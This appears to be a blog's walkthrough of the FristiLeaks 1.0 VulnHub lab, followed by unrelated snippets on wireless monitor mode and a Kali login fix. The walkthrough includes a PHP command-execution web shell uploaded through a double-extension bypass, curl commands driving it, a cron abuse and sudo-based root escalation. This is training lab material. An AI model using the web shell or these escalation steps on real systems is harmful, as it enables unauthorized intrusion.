I have shifted here.
c0dehouse shall now be maintained at http://n0tty.github.io from now on.
Please continue visiting! :)
<style>
pre code {
display: block;
overflow: scroll;
-webkit-overflow-scrolling: touch;
padding: 0 0.5em 1em;
border-radius: 0.5em;
background-color: #1b2426;
color: #4CAF50;
}
</style>
My (attacker) IP: 192.168.56.102
Vulnerable Image IP: 192.168.56.103
Software setup: Oracle VirtualBox on Kali 2.0
nmap -A -p- 192.168.56.103 -oA fristileaks
<meta name="description" content="super leet password login-test page. We use base64 encoding for images so they are inline in the HTML. I read somewhere on the web, that thats a good way to do it.">
<!--
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.
- by eezeepz
-->
At the bottom of the page we found small encoded snippet,
which much obviously directed us to this image.
<!--
iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==
-->
This leads us to
By now we can all guess who the user is and what his password would be.
After logging in, the harder portion of the 4 hours started. We now find a file upload page.
From the enumeration, we knew the server was Apache 2.2.15 running with PHP 5.3.3.
This meant the most common config mistake to allow file upload to be x.php.png.
I quickly wrote a 5 line script and uploaded it on the server.
<?php
if(isset($_REQUEST['cmd'])){
$cmd = ($_REQUEST["cmd"]);
system($cmd);
echo "</pre>$cmd<pre>";
die;}
?>
$ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=ls"
$ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat ../../../notes.txt"
hey eezeepz your homedir is a mess, go clean it up, just dont delete
the important stuff.
-jerry
</pre>cat ../../../notes.txt<pre>
$ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /home/eezeepz/notes.txt"
Yo EZ,
I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/
Don't forget to specify the full path for each binary!
Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.
- Jerry
</pre>cat /home/eezeepz/notes.txt<pre>
$ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=echo 'chmod 777 /home/admin'>/tmp/runthis"
$ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /tmp/cronresult"
command did not start with /home/admin or /usr/bincommand did not start with /home/admin or /usr/bincommand did not start with /home/admin or /usr/bin
$ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=echo '/home/admin/chmod 777 /home/admin'>/tmp/runthis"
$ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /tmp/cronresult"
command did not start with /home/admin or /usr/bincommand did not start with /home/admin or /usr/bincommand did not start with /home/admin or /usr/bin
executing: /home/admin/chmod 777 /home/admin
$ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /home/admin/cryptedpass.txt"
mVGZ3O3omkJLmy2pcuTq
</pre>cat /home/admin/cryptedpass.txt<pre>
$ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /home/admin/cryptpass.py"
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn<br />
import base64,codecs,sys
def encodeString(str):
base64string= base64.b64encode(str)
return codecs.encode(base64string[::-1], 'rot13')
cryptoResult=encodeString(sys.argv[1])
print cryptoResult
</pre>cat /home/admin/cryptpass.py<pre>
$ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /home/admin/whoisyourgodnow.txt"
=RFn0AKnlMHMPIzpyuTI0ITG
</pre>cat /home/admin/whoisyourgodnow.txt<pre>
$ cat decryptpass.py
#!/usr/bin/python
import base64,codecs,sys
def encodeString(str):
base64string = codecs.encode(str[::-1], 'rot13') //since English Language has 26 alphabets, we only need to do rot13 to get back the original
return base64.b64decode(base64string) // base64 decoding
cryptoResult=encodeString(sys.argv[1])
print cryptoResult
$ python decryptpass.py mVGZ3O3omkJLmy2pcuTq
thisisalsopw123
$ python decryptpass.py =RFn0AKnlMHMPIzpyuTI0ITG
LetThereBeFristi!
$ python -c 'import pty; pty.spawn("/bin/sh")'
/var/fristigod/.secret_admin_stuff/doCom
bash-4.1$ ./var/fristigod/.secret_admin_stuff/doCom
./var/fristigod/.secret_admin_stuff/doCom
Nice try, but wrong user ;)
bash-4.1$ sudo ./doCom
sudo ./doCom
Sorry, user fristigod is not allowed to execute './doCom' as root on localhost.localdomain.
bash-4.1$ sudo -l
sudo -l
Matching Defaults entries for fristigod on this host:
requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User fristigod may run the following commands on this host:
(fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom
bash-4.1$ sudo -u fristi ./doCom
sudo -u fristi ./doCom
Usage: ./program_name terminal_command ...
bash-4.1$ sudo -u fristi ./doCom /bin/bash
sudo -u fristi ./doCom /bin/bash
bash-4.1# id
id
uid=0(root) gid=100(users) groups=100(users),502(fristigod)
bash-4.1# cd /root
cd /root
bash-4.1# ls
ls
fristileaks_secrets.txt
bash-4.1# cat fristileaks_secrets.txt
cat fristileaks_secrets.txt
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]
I wonder if you beat it in the maximum 4 hours it's supposed to take!
Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)
Flag: Y0u_kn0w_y0u_l0ve_fr1st1
Information Gathering - Service Enumeration - Penetration - Maintaining Access - Housekeeping
Intelligence Gathering - Information Gathering + Service Enumeration = 80% of our work (40% for entry point)
Penetration = 5% of our work
Lateral Movement = 55% of our work (40% intelligence gathering post exploitation + 15% penetration into the crown of the network)
~# airmon-ng start wlan0 ... ~# airodump-ng wlan0mon ioctl(SIOCSIWMODE) failed: Device or resource busy
~# ifconfig wlan0mon down ~# iwconfig wlan0mon mode monitor ~# ifconfig wlan0mon up ~# airodump-ng wlan0mon
~# airmon-ng check kill
A terrible feeling when the grey page looks at your face and your head says to you,Oh no! Something has gone wrong. A problem has occurred and the system can't recover. Please log out and try again.
"hah you should have rather done a fresh install and wasted 10 hours from your life taking a backup and reformatting your LVM encrypted system."
Now add the following two lines. These enable the system to auto log into the non-root user after booting up. I still haven't completed the debugging process and hence am not able to give the exact reason for this error.root@kali:~# nano /etc/gdm3/daemon.conf
AutomaticLoginEnable = true AutomaticLogin = <Non-root Username>
If you can't sell it, don't bother making it.